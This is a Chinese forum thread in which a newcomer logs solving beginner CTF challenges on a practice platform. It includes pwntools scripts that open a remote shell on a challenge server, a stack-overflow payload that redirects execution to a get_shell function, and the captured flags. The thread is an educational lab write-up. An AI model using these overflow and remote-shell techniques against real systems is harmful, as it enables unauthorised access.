[新手入门] 记录打CTF的路线

查看15255 | 回复11 | 2020-5-12 15:04:51 | 显示全部楼层 |阅读模式

新人刚到工作岗位,发现这个叫CTF的有意思的东西。开个帖子记录一下自己打CTF的路,作为监督和鼓励自己的一个方法。
【不知道这个论坛是否允许记录帖,如果违反规定,就删掉吧,一定听从管理大佬的要求】

旧平台注册账号成功。
(一边学习汇编和二进制,一边)尝试解决PWN类型(顺便能做点web或misc就顺手做)。

Bxb_R | 2020-5-12 17:25:22 | 显示全部楼层
都做啊?

carl | 2020-5-12 20:13:23 | 显示全部楼层

尽量呗~反正会做的也不多,多看WP复现呗

carl | 2020-5-13 08:55:45 | 显示全部楼层

2020-5-13--------------
昨天签到题答上了,关注公众号然后发flag,系统就回复了
flag{BugKu-Sec-pwn!}

PWN第1题
只给了nc和IP:port,没有任何附件,只能先连上了
好像是个shell,输入pwd,回显了/,真的是shell
输入ls,回显有flag
输入cat flag,得到flag{6979d853add353c9},提交成功。

from pwn import *
p=remote('114.116.54.89',10001)
p.interactive()

carl | 2020-5-13 15:47:14 | 显示全部楼层
2020-5-13-------------
下午搭个win环境,顺便看看杂项
杂项【这是一张单纯的图片】
点击开就一张图,没有内容,习惯性抓包、F12,没直接看到啥有用的
用notepad++打开,最后看到一串unicode编码
转换过来发现flag只不过是key开头的
key{you are right}

Bxb_R | 2020-5-14 09:27:39 | 显示全部楼层
我想问 楼主是在线学生嘛

carl | 2020-5-14 15:33:31 | 显示全部楼层
Bxb_R 发表于 2020-5-14 09:27
我想问 楼主是在线学生嘛

是问在校学生吧?不是哦,已经是一条社畜了。

Bxb_R | 2020-5-14 15:56:15 | 显示全部楼层
carl 发表于 2020-5-14 15:33
是问在校学生吧?不是哦,已经是一条社畜了。

那打CTF是兴趣还是

carl | 2020-5-14 15:58:29 | 显示全部楼层
2020-5-14-------------
(开了一天会,真难受)
开始搞PWN2,盲猜没保护,直接IDAx64走起。
main函数里就有问题,声明了30长,结果读了100,一定有问题
然后观察函数列表,发现get_shell_函数,这个函数本身就调用了系统命令并运行了cat flag。
综上,只要发送payload让栈数据溢出、覆盖掉原来的返回地址,使得新地址跳到get_shell_函数即可
那么栈多长,返回地址在哪儿呢?
双击main函数里的&s参数,查看栈
很简单发现栈长30位,返回8位。同时再加上get_shell_的地址0x400751,完成payload编写
from pwn import *

work = remote("114.116.54.89",10003)
payload = 'Q' * (0x30+8) + p64(0x400751)
work.sendline(payload)
work.interactive()
最后运行得到flag{n0w_y0u_kn0w_the_Stack0verfl0w}

P.S.  网络不稳,网站响应慢,一度怀疑摸到EOF了,我感觉很淦!

carl | 2020-5-14 20:03:39 | 显示全部楼层
Bxb_R 发表于 2020-5-14 15:56
那打CTF是兴趣还是

一半一半吧,老大让我练练PWN这类的。之前自己喜欢玩玩Misc,毕竟喜欢开脑洞